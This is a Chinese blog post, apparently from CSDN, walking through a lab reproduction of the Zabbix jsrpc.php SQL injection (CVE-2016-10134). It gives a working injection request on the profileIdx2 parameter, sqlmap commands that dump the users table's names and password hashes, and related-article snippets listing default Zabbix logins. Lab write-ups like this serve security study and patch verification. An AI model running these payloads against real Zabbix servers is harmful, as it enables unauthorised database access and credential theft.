Zabbix注入漏洞复现

最新推荐文章于 2023-06-08 09:14:49 发布
最新推荐文章于 2023-06-08 09:14:49 发布
阅读量1.4k 收藏
点赞数
分类专栏: 内网安全 文章标签: zabbix web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43590351/article/details/126623773
版权

Zabbix漏洞复现

zabbix是一款服务器监控软件,主要由agent和Server组成分别安装在被监控主
机和服务器上,agent负责定期收集客户端的各种数据信息
当被监控的主机异常时会发送告警信息等。

1.1 CVE-2016-10134

漏洞搭建

利用vulhub靶场直接拉取即可

漏洞复现

靶场搭建完成后访问zabbix页面即可

在这里插入图片描述

zabbix的jsrpc.php页面参数未过滤存在sql漏洞,所以通过访问这个
jsrpc.php页面来触发漏洞,漏洞参数是profileIdx2。
发送如下请求包即可执行sql命令,获取用户数据库信息

POC

GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0) HTTP/1.1
Host: 139.224.225.64:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: zbx_sessionid=a910d1ec40f87376df62f0ef4432b7df; PHPSESSID=jrjqaip6ims54v8sctfdqevvm4
Upgrade-Insecure-Requests: 1

在这里插入图片描述

sqlmap

python sqlmap.py -u "http://139.224.225.64:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=
web.item.graph&resourcetype=17&profileIdx2=*" --batch

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-T4zazdrD-1661928411753)(Zabbix漏洞复现.assets/image-20220831104635583.png)]

可见是存在注入的,下面是爆破用户名密码信息。
sqlmap -u "http://139.224.225.64:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=
web.item.graph&resourcetype=17&profileIdx2=1" -D zabbix -T users -C name,passwd --dump
萌新_大鹏鸟
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulhub之Zabbix
weixin_56306210的博客
01-22 794
vulhub之Zabbix
Zabbix登录绕过漏洞(CVE-2022-23131)
渗透测试研究中心
03-03 3140
0x00 前言最近在zabbix漏洞(CVE-2022-23131),偶然间拿到了国外某公司zabbix服务器。Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意......
震惊——某白帽破解zabbix系统,实命令执行,最终获取shell
自强不息
05-19 1787
如果你坚持了自己的梦想,全世界都会为你让路。
ZABBIX 2.4.8漏洞
Nuyoah的博客
06-08 568
利用poc测试是否存在漏洞,放到kali下执行,首先修改poc.py里的端口,主机名。进入后台之后点击 组态–>动作–>自动注册–>创建动作。查看ZAXXIB,host 注册成功。添加主机成功,开启了自动注册功能。跳转到这个页面,选择添加主机。修改目录,直接读出flag。随便取一个名称,点击添加。
Zabbix漏洞
weixin_44237647的博客
11-20 1218
搜索方法:inurl:Zabbix/dashboard.php 漏洞说明: zabbix的某处存在报错注入,也可以使用sqlmap对报错点进行注入 报错点是profileIdx2= 发用户名不是name字段,而是alias字段。与网上流传的exp的有所不同。 脚本参照前辈: 独自等待 https://www.waitalone.cn/ 更改为python3版本 import requests import os import sys import re def checkSql(): payloa
zabbix注入利用工具
01-03
zabbix注入利用工具,超级好用了,常用的安全测试工具
zabbix6.4.6
最新发布
08-30
Zabbix是一款开源的企业级监控解决方案,它能够监控各种网络参数以确保服务器、网络设备和应用程序的正常运行。在本文中,我们将深入探讨如何在CentOS 7系统上安装Zabbix 6.4.6,这是一个功能强大的版本,包含了丰富...
Zabbix6.0中文手册
04-13
Zabbix 6.0 中文手册 Zabbix 是一个企业级的监控解决方案,提供了强大的监控和自动化功能。以下是 Zabbix 6.0 中文手册的知识点总结: 1. 简介:Zabbix 是一个基于 Web 的网络监控系统,可以监控各种网络设备和...
CVE-2022-23131 zabbix登录绕过漏洞
weixin_51339377的博客
04-09 4245
zabbix (可以实网络 架构等服务的监控 基于C语言开发 通过web界面进行管理 php制作 lamp的环境) 高可用性 HA high available 最长业务中断时间 (1-90%)x365 (1-99%)x365 (1-99.9%)x365 .... 6个9的情况 也就是(1-99.9999%)x365 说明软件系统是具备优秀的高可用性 具体zabbix的部署方式可以见Linux运维处进行部署 zabbix部署完成登录后界面 利用...
Zabbix漏洞总结
3569
01-24 5896
http://vinc.top/2017/04/18/zabbix%e6%bc%8f%e6%b4%9e%e6%80%bb%e7%bb%93/ 影响版本 1.8.5-1.8.9 利用前提 需要登录,默认口令 admin/zabbix或者是guest/空 使用Guest账户登录 报错注入 httpmon.php?applications=2 and (select 1 fro
zabbix 漏洞收集总结
sojrs_sec的博客
12-31 2694
一: 弱口令/默认账号 admin:zabbix Admin:zabbix guest: 空 二: sql注入(ave-2016-10134) 版本 2.2.x 3.3.0-3.03 1 http://192.168.239.24/latest.php?output=ajax&sid=bb3e723dc1a917a2&favobj=toggle&toggle_open_s...
zabbix最新漏洞,可绕过认证登陆!
笨办法学linux的博客
08-26 1669
Zabbix是一个非常流行的开源监控平台,用于收集、集中和跟踪整个基础设施中的CPU负载和网络流量等指标。式,导致在启动SAML SSO认证模式的前提下,恶意用户可通过构造特殊请求绕过认证,获取管理员权限,进而可实RCE。...
mysql中添加字段
热门推荐
m0_54850467的博客
09-11 4万+
深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
zabbix jsrpc.php,Zabbix SQL(jsrpc.php) 注入漏洞分析 (以3.0.2为例)
weixin_28993705的博客
03-10 681
近日,Zabbix的web后台爆出一个sql注入漏洞。青藤云安全团队立即响应,并提出了临时&最佳解决方案。0x00 漏洞概述漏洞类型:SQL 注入危险等级:高利用条件:该漏洞需要登录,但是系统内置Guest帐号且默认为启用状态。受影响参数:profileIdx20x01POC测试http://xxx.testzabbix.com/zabbix/jsrpc.php?sid=0bcd4ad...
[ vulhub漏洞篇 ] zabbix SQL注入漏洞 (CVE-2016-10134)
qq_51577576的博客
08-14 3480
👨‍🎓 博主介绍:大家好,我是,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋🙏作者水平有限,欢迎各位大佬指点,相互学习进步!......
zabbix latest.php SQL注入漏洞(CVE-2016-10134)
黑白的博客
12-23 261
声明 好好学习,天天向上 漏洞描述 zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。 影响范围 2.2.x 3.3.0-3.03 过程 这里使用3.0.3版本 使用vulhub /app/vulhub-master/zabbix/CVE-2016-10134 使用docker启动 docker-compose build docker-compose up -d 环境启动后,访问 http://192.168.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值